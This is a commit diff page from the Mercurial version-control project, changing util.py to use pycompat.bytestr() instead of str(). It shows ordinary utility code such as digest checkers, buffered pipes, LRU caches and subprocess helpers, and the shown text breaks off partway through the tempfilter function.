util: use pycompat.bytestr() instead of str()...
Augie Fackler
r36436:d26b0bed default
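The diff below swaps str() for pycompat.bytestr() in py2shell(). A minimal sketch of why this matters on Python 3 (illustrative only, not part of the commit):

# On Python 3, environment values handed to the shell must stay bytes,
# and str() applied to a bytes value yields its repr, not its content.
val = b'/usr/bin/hg'
str(val)                  # "b'/usr/bin/hg'" -- wrong content for $HG
# pycompat.bytestr coerces the value to bytes on Python 3 (and is plain
# str on Python 2), so py2shell keeps returning byte strings.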
@@ -1,4009 +1,4009 @@
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 29 import itertools
30 30 import mmap
31 31 import os
32 32 import platform as pyplatform
33 33 import re as remod
34 34 import shutil
35 35 import signal
36 36 import socket
37 37 import stat
38 38 import string
39 39 import subprocess
40 40 import sys
41 41 import tempfile
42 42 import textwrap
43 43 import time
44 44 import traceback
45 45 import warnings
46 46 import zlib
47 47
48 48 from . import (
49 49 encoding,
50 50 error,
51 51 i18n,
52 52 node as nodemod,
53 53 policy,
54 54 pycompat,
55 55 urllibcompat,
56 56 )
57 57
58 58 base85 = policy.importmod(r'base85')
59 59 osutil = policy.importmod(r'osutil')
60 60 parsers = policy.importmod(r'parsers')
61 61
62 62 b85decode = base85.b85decode
63 63 b85encode = base85.b85encode
64 64
65 65 cookielib = pycompat.cookielib
66 66 empty = pycompat.empty
67 67 httplib = pycompat.httplib
68 68 pickle = pycompat.pickle
69 69 queue = pycompat.queue
70 70 socketserver = pycompat.socketserver
71 71 stderr = pycompat.stderr
72 72 stdin = pycompat.stdin
73 73 stdout = pycompat.stdout
74 74 stringio = pycompat.stringio
75 75 xmlrpclib = pycompat.xmlrpclib
76 76
77 77 httpserver = urllibcompat.httpserver
78 78 urlerr = urllibcompat.urlerr
79 79 urlreq = urllibcompat.urlreq
80 80
81 81 # workaround for win32mbcs
82 82 _filenamebytestr = pycompat.bytestr
83 83
84 84 def isatty(fp):
85 85 try:
86 86 return fp.isatty()
87 87 except AttributeError:
88 88 return False
89 89
90 90 # glibc determines buffering on first write to stdout - if we replace a
91 91 # TTY-destined stdout with a pipe-destined stdout (e.g. a pager), we want
92 92 # line buffering
93 93 if isatty(stdout):
94 94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
95 95
96 96 if pycompat.iswindows:
97 97 from . import windows as platform
98 98 stdout = platform.winstdout(stdout)
99 99 else:
100 100 from . import posix as platform
101 101
102 102 _ = i18n._
103 103
104 104 bindunixsocket = platform.bindunixsocket
105 105 cachestat = platform.cachestat
106 106 checkexec = platform.checkexec
107 107 checklink = platform.checklink
108 108 copymode = platform.copymode
109 109 executablepath = platform.executablepath
110 110 expandglobs = platform.expandglobs
111 111 explainexit = platform.explainexit
112 112 findexe = platform.findexe
113 113 getfsmountpoint = platform.getfsmountpoint
114 114 getfstype = platform.getfstype
115 115 gethgcmd = platform.gethgcmd
116 116 getuser = platform.getuser
117 117 getpid = os.getpid
118 118 groupmembers = platform.groupmembers
119 119 groupname = platform.groupname
120 120 hidewindow = platform.hidewindow
121 121 isexec = platform.isexec
122 122 isowner = platform.isowner
123 123 listdir = osutil.listdir
124 124 localpath = platform.localpath
125 125 lookupreg = platform.lookupreg
126 126 makedir = platform.makedir
127 127 nlinks = platform.nlinks
128 128 normpath = platform.normpath
129 129 normcase = platform.normcase
130 130 normcasespec = platform.normcasespec
131 131 normcasefallback = platform.normcasefallback
132 132 openhardlinks = platform.openhardlinks
133 133 oslink = platform.oslink
134 134 parsepatchoutput = platform.parsepatchoutput
135 135 pconvert = platform.pconvert
136 136 poll = platform.poll
137 137 popen = platform.popen
138 138 posixfile = platform.posixfile
139 139 quotecommand = platform.quotecommand
140 140 readpipe = platform.readpipe
141 141 rename = platform.rename
142 142 removedirs = platform.removedirs
143 143 samedevice = platform.samedevice
144 144 samefile = platform.samefile
145 145 samestat = platform.samestat
146 146 setbinary = platform.setbinary
147 147 setflags = platform.setflags
148 148 setsignalhandler = platform.setsignalhandler
149 149 shellquote = platform.shellquote
150 150 shellsplit = platform.shellsplit
151 151 spawndetached = platform.spawndetached
152 152 split = platform.split
153 153 sshargs = platform.sshargs
154 154 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
155 155 statisexec = platform.statisexec
156 156 statislink = platform.statislink
157 157 testpid = platform.testpid
158 158 umask = platform.umask
159 159 unlink = platform.unlink
160 160 username = platform.username
161 161
162 162 try:
163 163 recvfds = osutil.recvfds
164 164 except AttributeError:
165 165 pass
166 166 try:
167 167 setprocname = osutil.setprocname
168 168 except AttributeError:
169 169 pass
170 170 try:
171 171 unblocksignal = osutil.unblocksignal
172 172 except AttributeError:
173 173 pass
174 174
175 175 # Python compatibility
176 176
177 177 _notset = object()
178 178
179 179 # disable Python's problematic floating point timestamps (issue4836)
180 180 # (Python hypocritically says you shouldn't change this behavior in
181 181 # libraries, and sure enough Mercurial is not a library.)
182 182 os.stat_float_times(False)
183 183
184 184 def safehasattr(thing, attr):
185 185 return getattr(thing, attr, _notset) is not _notset
186 186
187 187 def _rapply(f, xs):
188 188 if xs is None:
189 189 # assume None means non-value of optional data
190 190 return xs
191 191 if isinstance(xs, (list, set, tuple)):
192 192 return type(xs)(_rapply(f, x) for x in xs)
193 193 if isinstance(xs, dict):
194 194 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
195 195 return f(xs)
196 196
197 197 def rapply(f, xs):
198 198 """Apply function recursively to every item preserving the data structure
199 199
200 200 >>> def f(x):
201 201 ... return 'f(%s)' % x
202 202 >>> rapply(f, None) is None
203 203 True
204 204 >>> rapply(f, 'a')
205 205 'f(a)'
206 206 >>> rapply(f, {'a'}) == {'f(a)'}
207 207 True
208 208 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
209 209 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
210 210
211 211 >>> xs = [object()]
212 212 >>> rapply(pycompat.identity, xs) is xs
213 213 True
214 214 """
215 215 if f is pycompat.identity:
216 216 # fast path mainly for py2
217 217 return xs
218 218 return _rapply(f, xs)
219 219
220 220 def bytesinput(fin, fout, *args, **kwargs):
221 221 sin, sout = sys.stdin, sys.stdout
222 222 try:
223 223 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
224 224 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
225 225 finally:
226 226 sys.stdin, sys.stdout = sin, sout
227 227
228 228 def bitsfrom(container):
229 229 bits = 0
230 230 for bit in container:
231 231 bits |= bit
232 232 return bits
233 233
234 234 # python 2.6 still has deprecation warnings enabled by default. We do not
235 235 # want to display anything to the standard user, so detect if we are running
236 236 # tests and only use python deprecation warnings in this case.
237 237 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
238 238 if _dowarn:
239 239 # explicitly unfilter our warning for python 2.7
240 240 #
241 241 # The option of setting PYTHONWARNINGS in the test runner was investigated.
242 242 # However, module names set through PYTHONWARNINGS were matched exactly, so
243 243 # we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'. This
244 244 # makes the whole PYTHONWARNINGS thing useless for our use case.
245 245 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
246 246 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
247 247 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
248 248
249 249 def nouideprecwarn(msg, version, stacklevel=1):
250 250 """Issue an python native deprecation warning
251 251
252 252 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
253 253 """
254 254 if _dowarn:
255 255 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
256 256 " update your code.)") % version
257 257 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
258 258
259 259 DIGESTS = {
260 260 'md5': hashlib.md5,
261 261 'sha1': hashlib.sha1,
262 262 'sha512': hashlib.sha512,
263 263 }
264 264 # List of digest types from strongest to weakest
265 265 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
266 266
267 267 for k in DIGESTS_BY_STRENGTH:
268 268 assert k in DIGESTS
269 269
270 270 class digester(object):
271 271 """helper to compute digests.
272 272
273 273 This helper can be used to compute one or more digests given their name.
274 274
275 275 >>> d = digester([b'md5', b'sha1'])
276 276 >>> d.update(b'foo')
277 277 >>> [k for k in sorted(d)]
278 278 ['md5', 'sha1']
279 279 >>> d[b'md5']
280 280 'acbd18db4cc2f85cedef654fccc4a4d8'
281 281 >>> d[b'sha1']
282 282 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
283 283 >>> digester.preferred([b'md5', b'sha1'])
284 284 'sha1'
285 285 """
286 286
287 287 def __init__(self, digests, s=''):
288 288 self._hashes = {}
289 289 for k in digests:
290 290 if k not in DIGESTS:
291 291 raise Abort(_('unknown digest type: %s') % k)
292 292 self._hashes[k] = DIGESTS[k]()
293 293 if s:
294 294 self.update(s)
295 295
296 296 def update(self, data):
297 297 for h in self._hashes.values():
298 298 h.update(data)
299 299
300 300 def __getitem__(self, key):
301 301 if key not in DIGESTS:
302 302 raise Abort(_('unknown digest type: %s') % key)
303 303 return nodemod.hex(self._hashes[key].digest())
304 304
305 305 def __iter__(self):
306 306 return iter(self._hashes)
307 307
308 308 @staticmethod
309 309 def preferred(supported):
310 310 """returns the strongest digest type in both supported and DIGESTS."""
311 311
312 312 for k in DIGESTS_BY_STRENGTH:
313 313 if k in supported:
314 314 return k
315 315 return None
316 316
317 317 class digestchecker(object):
318 318 """file handle wrapper that additionally checks content against a given
319 319 size and digests.
320 320
321 321 d = digestchecker(fh, size, {'md5': '...'})
322 322
323 323 When multiple digests are given, all of them are validated.
324 324 """
325 325
326 326 def __init__(self, fh, size, digests):
327 327 self._fh = fh
328 328 self._size = size
329 329 self._got = 0
330 330 self._digests = dict(digests)
331 331 self._digester = digester(self._digests.keys())
332 332
333 333 def read(self, length=-1):
334 334 content = self._fh.read(length)
335 335 self._digester.update(content)
336 336 self._got += len(content)
337 337 return content
338 338
339 339 def validate(self):
340 340 if self._size != self._got:
341 341 raise Abort(_('size mismatch: expected %d, got %d') %
342 342 (self._size, self._got))
343 343 for k, v in self._digests.items():
344 344 if v != self._digester[k]:
345 345 # i18n: first parameter is a digest name
346 346 raise Abort(_('%s mismatch: expected %s, got %s') %
347 347 (k, v, self._digester[k]))
348 348
349 349 try:
350 350 buffer = buffer
351 351 except NameError:
352 352 def buffer(sliceable, offset=0, length=None):
353 353 if length is not None:
354 354 return memoryview(sliceable)[offset:offset + length]
355 355 return memoryview(sliceable)[offset:]
356 356
357 357 closefds = pycompat.isposix
358 358
359 359 _chunksize = 4096
360 360
361 361 class bufferedinputpipe(object):
362 362 """a manually buffered input pipe
363 363
364 364 Python will not let us use buffered IO and lazy reading with 'polling' at
365 365 the same time. We cannot probe the buffer state and select will not detect
366 366 that data are ready to read if they are already buffered.
367 367
368 368 This class lets us work around that by implementing its own buffering
369 369 (allowing efficient readline) while offering a way to know if the buffer is
370 370 empty from the output (allowing collaboration of the buffer with polling).
371 371
372 372 This class lives in the 'util' module because it makes use of the 'os'
373 373 module from the python stdlib.
374 374 """
375 375
376 376 def __init__(self, input):
377 377 self._input = input
378 378 self._buffer = []
379 379 self._eof = False
380 380 self._lenbuf = 0
381 381
382 382 @property
383 383 def hasbuffer(self):
384 384 """True is any data is currently buffered
385 385
386 386 This will be used externally a pre-step for polling IO. If there is
387 387 already data then no polling should be set in place."""
388 388 return bool(self._buffer)
389 389
390 390 @property
391 391 def closed(self):
392 392 return self._input.closed
393 393
394 394 def fileno(self):
395 395 return self._input.fileno()
396 396
397 397 def close(self):
398 398 return self._input.close()
399 399
400 400 def read(self, size):
401 401 while (not self._eof) and (self._lenbuf < size):
402 402 self._fillbuffer()
403 403 return self._frombuffer(size)
404 404
405 405 def readline(self, *args, **kwargs):
406 406 if 1 < len(self._buffer):
407 407 # this should not happen because both read and readline end with a
408 408 # _frombuffer call that collapses it.
409 409 self._buffer = [''.join(self._buffer)]
410 410 self._lenbuf = len(self._buffer[0])
411 411 lfi = -1
412 412 if self._buffer:
413 413 lfi = self._buffer[-1].find('\n')
414 414 while (not self._eof) and lfi < 0:
415 415 self._fillbuffer()
416 416 if self._buffer:
417 417 lfi = self._buffer[-1].find('\n')
418 418 size = lfi + 1
419 419 if lfi < 0: # end of file
420 420 size = self._lenbuf
421 421 elif 1 < len(self._buffer):
422 422 # we need to take previous chunks into account
423 423 size += self._lenbuf - len(self._buffer[-1])
424 424 return self._frombuffer(size)
425 425
426 426 def _frombuffer(self, size):
427 427 """return at most 'size' data from the buffer
428 428
429 429 The data are removed from the buffer."""
430 430 if size == 0 or not self._buffer:
431 431 return ''
432 432 buf = self._buffer[0]
433 433 if 1 < len(self._buffer):
434 434 buf = ''.join(self._buffer)
435 435
436 436 data = buf[:size]
437 437 buf = buf[len(data):]
438 438 if buf:
439 439 self._buffer = [buf]
440 440 self._lenbuf = len(buf)
441 441 else:
442 442 self._buffer = []
443 443 self._lenbuf = 0
444 444 return data
445 445
446 446 def _fillbuffer(self):
447 447 """read data to the buffer"""
448 448 data = os.read(self._input.fileno(), _chunksize)
449 449 if not data:
450 450 self._eof = True
451 451 else:
452 452 self._lenbuf += len(data)
453 453 self._buffer.append(data)
454 454
455 455 def mmapread(fp):
456 456 try:
457 457 fd = getattr(fp, 'fileno', lambda: fp)()
458 458 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
459 459 except ValueError:
460 460 # Empty files cannot be mmapped, but mmapread should still work. Check
461 461 # if the file is empty, and if so, return an empty buffer.
462 462 if os.fstat(fd).st_size == 0:
463 463 return ''
464 464 raise
465 465
466 466 def popen2(cmd, env=None, newlines=False):
467 467 # Setting bufsize to -1 lets the system decide the buffer size.
468 468 # The default for bufsize is 0, meaning unbuffered. This leads to
469 469 # poor performance on Mac OS X: http://bugs.python.org/issue4194
470 470 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
471 471 close_fds=closefds,
472 472 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
473 473 universal_newlines=newlines,
474 474 env=env)
475 475 return p.stdin, p.stdout
476 476
477 477 def popen3(cmd, env=None, newlines=False):
478 478 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
479 479 return stdin, stdout, stderr
480 480
481 481 def popen4(cmd, env=None, newlines=False, bufsize=-1):
482 482 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
483 483 close_fds=closefds,
484 484 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
485 485 stderr=subprocess.PIPE,
486 486 universal_newlines=newlines,
487 487 env=env)
488 488 return p.stdin, p.stdout, p.stderr, p
489 489
490 490 def version():
491 491 """Return version information if available."""
492 492 try:
493 493 from . import __version__
494 494 return __version__.version
495 495 except ImportError:
496 496 return 'unknown'
497 497
498 498 def versiontuple(v=None, n=4):
499 499 """Parses a Mercurial version string into an N-tuple.
500 500
501 501 The version string to be parsed is specified with the ``v`` argument.
502 502 If it isn't defined, the current Mercurial version string will be parsed.
503 503
504 504 ``n`` can be 2, 3, or 4. Here is how some version strings map to
505 505 returned values:
506 506
507 507 >>> v = b'3.6.1+190-df9b73d2d444'
508 508 >>> versiontuple(v, 2)
509 509 (3, 6)
510 510 >>> versiontuple(v, 3)
511 511 (3, 6, 1)
512 512 >>> versiontuple(v, 4)
513 513 (3, 6, 1, '190-df9b73d2d444')
514 514
515 515 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
516 516 (3, 6, 1, '190-df9b73d2d444+20151118')
517 517
518 518 >>> v = b'3.6'
519 519 >>> versiontuple(v, 2)
520 520 (3, 6)
521 521 >>> versiontuple(v, 3)
522 522 (3, 6, None)
523 523 >>> versiontuple(v, 4)
524 524 (3, 6, None, None)
525 525
526 526 >>> v = b'3.9-rc'
527 527 >>> versiontuple(v, 2)
528 528 (3, 9)
529 529 >>> versiontuple(v, 3)
530 530 (3, 9, None)
531 531 >>> versiontuple(v, 4)
532 532 (3, 9, None, 'rc')
533 533
534 534 >>> v = b'3.9-rc+2-02a8fea4289b'
535 535 >>> versiontuple(v, 2)
536 536 (3, 9)
537 537 >>> versiontuple(v, 3)
538 538 (3, 9, None)
539 539 >>> versiontuple(v, 4)
540 540 (3, 9, None, 'rc+2-02a8fea4289b')
541 541 """
542 542 if not v:
543 543 v = version()
544 544 parts = remod.split('[\+-]', v, 1)
545 545 if len(parts) == 1:
546 546 vparts, extra = parts[0], None
547 547 else:
548 548 vparts, extra = parts
549 549
550 550 vints = []
551 551 for i in vparts.split('.'):
552 552 try:
553 553 vints.append(int(i))
554 554 except ValueError:
555 555 break
556 556 # (3, 6) -> (3, 6, None)
557 557 while len(vints) < 3:
558 558 vints.append(None)
559 559
560 560 if n == 2:
561 561 return (vints[0], vints[1])
562 562 if n == 3:
563 563 return (vints[0], vints[1], vints[2])
564 564 if n == 4:
565 565 return (vints[0], vints[1], vints[2], extra)
566 566
567 567 # used by parsedate
568 568 defaultdateformats = (
569 569 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
570 570 '%Y-%m-%dT%H:%M', # without seconds
571 571 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
572 572 '%Y-%m-%dT%H%M', # without seconds
573 573 '%Y-%m-%d %H:%M:%S', # our common legal variant
574 574 '%Y-%m-%d %H:%M', # without seconds
575 575 '%Y-%m-%d %H%M%S', # without :
576 576 '%Y-%m-%d %H%M', # without seconds
577 577 '%Y-%m-%d %I:%M:%S%p',
578 578 '%Y-%m-%d %H:%M',
579 579 '%Y-%m-%d %I:%M%p',
580 580 '%Y-%m-%d',
581 581 '%m-%d',
582 582 '%m/%d',
583 583 '%m/%d/%y',
584 584 '%m/%d/%Y',
585 585 '%a %b %d %H:%M:%S %Y',
586 586 '%a %b %d %I:%M:%S%p %Y',
587 587 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
588 588 '%b %d %H:%M:%S %Y',
589 589 '%b %d %I:%M:%S%p %Y',
590 590 '%b %d %H:%M:%S',
591 591 '%b %d %I:%M:%S%p',
592 592 '%b %d %H:%M',
593 593 '%b %d %I:%M%p',
594 594 '%b %d %Y',
595 595 '%b %d',
596 596 '%H:%M:%S',
597 597 '%I:%M:%S%p',
598 598 '%H:%M',
599 599 '%I:%M%p',
600 600 )
601 601
602 602 extendeddateformats = defaultdateformats + (
603 603 "%Y",
604 604 "%Y-%m",
605 605 "%b",
606 606 "%b %Y",
607 607 )
608 608
609 609 def cachefunc(func):
610 610 '''cache the result of function calls'''
611 611 # XXX doesn't handle keywords args
612 612 if func.__code__.co_argcount == 0:
613 613 cache = []
614 614 def f():
615 615 if len(cache) == 0:
616 616 cache.append(func())
617 617 return cache[0]
618 618 return f
619 619 cache = {}
620 620 if func.__code__.co_argcount == 1:
621 621 # we gain a small amount of time because
622 622 # we don't need to pack/unpack the list
623 623 def f(arg):
624 624 if arg not in cache:
625 625 cache[arg] = func(arg)
626 626 return cache[arg]
627 627 else:
628 628 def f(*args):
629 629 if args not in cache:
630 630 cache[args] = func(*args)
631 631 return cache[args]
632 632
633 633 return f
634 634
635 635 class cow(object):
636 636 """helper class to make copy-on-write easier
637 637
638 638 Call preparewrite before doing any writes.
639 639 """
640 640
641 641 def preparewrite(self):
642 642 """call this before writes, return self or a copied new object"""
643 643 if getattr(self, '_copied', 0):
644 644 self._copied -= 1
645 645 return self.__class__(self)
646 646 return self
647 647
648 648 def copy(self):
649 649 """always do a cheap copy"""
650 650 self._copied = getattr(self, '_copied', 0) + 1
651 651 return self
652 652
653 653 class sortdict(collections.OrderedDict):
654 654 '''a simple sorted dictionary
655 655
656 656 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
657 657 >>> d2 = d1.copy()
658 658 >>> d2
659 659 sortdict([('a', 0), ('b', 1)])
660 660 >>> d2.update([(b'a', 2)])
661 661 >>> list(d2.keys()) # should still be in last-set order
662 662 ['b', 'a']
663 663 '''
664 664
665 665 def __setitem__(self, key, value):
666 666 if key in self:
667 667 del self[key]
668 668 super(sortdict, self).__setitem__(key, value)
669 669
670 670 if pycompat.ispypy:
671 671 # __setitem__() isn't called as of PyPy 5.8.0
672 672 def update(self, src):
673 673 if isinstance(src, dict):
674 674 src = src.iteritems()
675 675 for k, v in src:
676 676 self[k] = v
677 677
678 678 class cowdict(cow, dict):
679 679 """copy-on-write dict
680 680
681 681 Be sure to call d = d.preparewrite() before writing to d.
682 682
683 683 >>> a = cowdict()
684 684 >>> a is a.preparewrite()
685 685 True
686 686 >>> b = a.copy()
687 687 >>> b is a
688 688 True
689 689 >>> c = b.copy()
690 690 >>> c is a
691 691 True
692 692 >>> a = a.preparewrite()
693 693 >>> b is a
694 694 False
695 695 >>> a is a.preparewrite()
696 696 True
697 697 >>> c = c.preparewrite()
698 698 >>> b is c
699 699 False
700 700 >>> b is b.preparewrite()
701 701 True
702 702 """
703 703
704 704 class cowsortdict(cow, sortdict):
705 705 """copy-on-write sortdict
706 706
707 707 Be sure to call d = d.preparewrite() before writing to d.
708 708 """
709 709
710 710 class transactional(object):
711 711 """Base class for making a transactional type into a context manager."""
712 712 __metaclass__ = abc.ABCMeta
713 713
714 714 @abc.abstractmethod
715 715 def close(self):
716 716 """Successfully closes the transaction."""
717 717
718 718 @abc.abstractmethod
719 719 def release(self):
720 720 """Marks the end of the transaction.
721 721
722 722 If the transaction has not been closed, it will be aborted.
723 723 """
724 724
725 725 def __enter__(self):
726 726 return self
727 727
728 728 def __exit__(self, exc_type, exc_val, exc_tb):
729 729 try:
730 730 if exc_type is None:
731 731 self.close()
732 732 finally:
733 733 self.release()
734 734
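# Illustrative sketch (editor's addition, not part of util.py): once
# close() and release() are implemented, transactional's __enter__/__exit__
# commit on a clean exit and abort on an exception. 'demotransaction' is a
# hypothetical subclass.
class demotransaction(transactional):
    def __init__(self):
        self.state = 'pending'
    def close(self):
        self.state = 'committed'
    def release(self):
        if self.state != 'committed':
            self.state = 'aborted'

with demotransaction() as tr:
    pass   # clean exit -> close() then release(); an exception -> abort
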
735 735 @contextlib.contextmanager
736 736 def acceptintervention(tr=None):
737 737 """A context manager that closes the transaction on InterventionRequired
738 738
739 739 If no transaction was provided, this simply runs the body and returns
740 740 """
741 741 if not tr:
742 742 yield
743 743 return
744 744 try:
745 745 yield
746 746 tr.close()
747 747 except error.InterventionRequired:
748 748 tr.close()
749 749 raise
750 750 finally:
751 751 tr.release()
752 752
753 753 @contextlib.contextmanager
754 754 def nullcontextmanager():
755 755 yield
756 756
757 757 class _lrucachenode(object):
758 758 """A node in a doubly linked list.
759 759
760 760 Holds a reference to nodes on either side as well as a key-value
761 761 pair for the dictionary entry.
762 762 """
763 763 __slots__ = (u'next', u'prev', u'key', u'value')
764 764
765 765 def __init__(self):
766 766 self.next = None
767 767 self.prev = None
768 768
769 769 self.key = _notset
770 770 self.value = None
771 771
772 772 def markempty(self):
773 773 """Mark the node as emptied."""
774 774 self.key = _notset
775 775
776 776 class lrucachedict(object):
777 777 """Dict that caches most recent accesses and sets.
778 778
779 779 The dict consists of an actual backing dict - indexed by original
780 780 key - and a doubly linked circular list defining the order of entries in
781 781 the cache.
782 782
783 783 The head node is the newest entry in the cache. If the cache is full,
784 784 we recycle head.prev and make it the new head. Cache accesses result in
785 785 the node being moved to before the existing head and being marked as the
786 786 new head node.
787 787 """
788 788 def __init__(self, max):
789 789 self._cache = {}
790 790
791 791 self._head = head = _lrucachenode()
792 792 head.prev = head
793 793 head.next = head
794 794 self._size = 1
795 795 self._capacity = max
796 796
797 797 def __len__(self):
798 798 return len(self._cache)
799 799
800 800 def __contains__(self, k):
801 801 return k in self._cache
802 802
803 803 def __iter__(self):
804 804 # We don't have to iterate in cache order, but why not.
805 805 n = self._head
806 806 for i in range(len(self._cache)):
807 807 yield n.key
808 808 n = n.next
809 809
810 810 def __getitem__(self, k):
811 811 node = self._cache[k]
812 812 self._movetohead(node)
813 813 return node.value
814 814
815 815 def __setitem__(self, k, v):
816 816 node = self._cache.get(k)
817 817 # Replace existing value and mark as newest.
818 818 if node is not None:
819 819 node.value = v
820 820 self._movetohead(node)
821 821 return
822 822
823 823 if self._size < self._capacity:
824 824 node = self._addcapacity()
825 825 else:
826 826 # Grab the last/oldest item.
827 827 node = self._head.prev
828 828
829 829 # At capacity. Kill the old entry.
830 830 if node.key is not _notset:
831 831 del self._cache[node.key]
832 832
833 833 node.key = k
834 834 node.value = v
835 835 self._cache[k] = node
836 836 # And mark it as newest entry. No need to adjust order since it
837 837 # is already self._head.prev.
838 838 self._head = node
839 839
840 840 def __delitem__(self, k):
841 841 node = self._cache.pop(k)
842 842 node.markempty()
843 843
844 844 # Temporarily mark as newest item before re-adjusting head to make
845 845 # this node the oldest item.
846 846 self._movetohead(node)
847 847 self._head = node.next
848 848
849 849 # Additional dict methods.
850 850
851 851 def get(self, k, default=None):
852 852 try:
853 853 return self._cache[k].value
854 854 except KeyError:
855 855 return default
856 856
857 857 def clear(self):
858 858 n = self._head
859 859 while n.key is not _notset:
860 860 n.markempty()
861 861 n = n.next
862 862
863 863 self._cache.clear()
864 864
865 865 def copy(self):
866 866 result = lrucachedict(self._capacity)
867 867 n = self._head.prev
868 868 # Iterate in oldest-to-newest order, so the copy has the right ordering
869 869 for i in range(len(self._cache)):
870 870 result[n.key] = n.value
871 871 n = n.prev
872 872 return result
873 873
874 874 def _movetohead(self, node):
875 875 """Mark a node as the newest, making it the new head.
876 876
877 877 When a node is accessed, it becomes the freshest entry in the LRU
878 878 list, which is denoted by self._head.
879 879
880 880 Visually, let's make ``N`` the new head node (* denotes head):
881 881
882 882 previous/oldest <-> head <-> next/next newest
883 883
884 884 ----<->--- A* ---<->-----
885 885 | |
886 886 E <-> D <-> N <-> C <-> B
887 887
888 888 To:
889 889
890 890 ----<->--- N* ---<->-----
891 891 | |
892 892 E <-> D <-> C <-> B <-> A
893 893
894 894 This requires the following moves:
895 895
896 896 C.next = D (node.prev.next = node.next)
897 897 D.prev = C (node.next.prev = node.prev)
898 898 E.next = N (head.prev.next = node)
899 899 N.prev = E (node.prev = head.prev)
900 900 N.next = A (node.next = head)
901 901 A.prev = N (head.prev = node)
902 902 """
903 903 head = self._head
904 904 # C.next = D
905 905 node.prev.next = node.next
906 906 # D.prev = C
907 907 node.next.prev = node.prev
908 908 # N.prev = E
909 909 node.prev = head.prev
910 910 # N.next = A
911 911 # It is tempting to do just "head" here, however if node is
912 912 # adjacent to head, this will do bad things.
913 913 node.next = head.prev.next
914 914 # E.next = N
915 915 node.next.prev = node
916 916 # A.prev = N
917 917 node.prev.next = node
918 918
919 919 self._head = node
920 920
921 921 def _addcapacity(self):
922 922 """Add a node to the circular linked list.
923 923
924 924 The new node is inserted before the head node.
925 925 """
926 926 head = self._head
927 927 node = _lrucachenode()
928 928 head.prev.next = node
929 929 node.prev = head.prev
930 930 node.next = head
931 931 head.prev = node
932 932 self._size += 1
933 933 return node
934 934
935 935 def lrucachefunc(func):
936 936 '''cache most recent results of function calls'''
937 937 cache = {}
938 938 order = collections.deque()
939 939 if func.__code__.co_argcount == 1:
940 940 def f(arg):
941 941 if arg not in cache:
942 942 if len(cache) > 20:
943 943 del cache[order.popleft()]
944 944 cache[arg] = func(arg)
945 945 else:
946 946 order.remove(arg)
947 947 order.append(arg)
948 948 return cache[arg]
949 949 else:
950 950 def f(*args):
951 951 if args not in cache:
952 952 if len(cache) > 20:
953 953 del cache[order.popleft()]
954 954 cache[args] = func(*args)
955 955 else:
956 956 order.remove(args)
957 957 order.append(args)
958 958 return cache[args]
959 959
960 960 return f
961 961
962 962 class propertycache(object):
963 963 def __init__(self, func):
964 964 self.func = func
965 965 self.name = func.__name__
966 966 def __get__(self, obj, type=None):
967 967 result = self.func(obj)
968 968 self.cachevalue(obj, result)
969 969 return result
970 970
971 971 def cachevalue(self, obj, value):
972 972 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
973 973 obj.__dict__[self.name] = value
974 974
975 975 def clearcachedproperty(obj, prop):
976 976 '''clear a cached property value, if one has been set'''
977 977 if prop in obj.__dict__:
978 978 del obj.__dict__[prop]
979 979
980 980 def pipefilter(s, cmd):
981 981 '''filter string S through command CMD, returning its output'''
982 982 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
983 983 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
984 984 pout, perr = p.communicate(s)
985 985 return pout
986 986
987 987 def tempfilter(s, cmd):
988 988 '''filter string S through a pair of temporary files with CMD.
989 989 CMD is used as a template to create the real command to be run,
990 990 with the strings INFILE and OUTFILE replaced by the real names of
991 991 the temporary files generated.'''
992 992 inname, outname = None, None
993 993 try:
994 994 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
995 995 fp = os.fdopen(infd, pycompat.sysstr('wb'))
996 996 fp.write(s)
997 997 fp.close()
998 998 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
999 999 os.close(outfd)
1000 1000 cmd = cmd.replace('INFILE', inname)
1001 1001 cmd = cmd.replace('OUTFILE', outname)
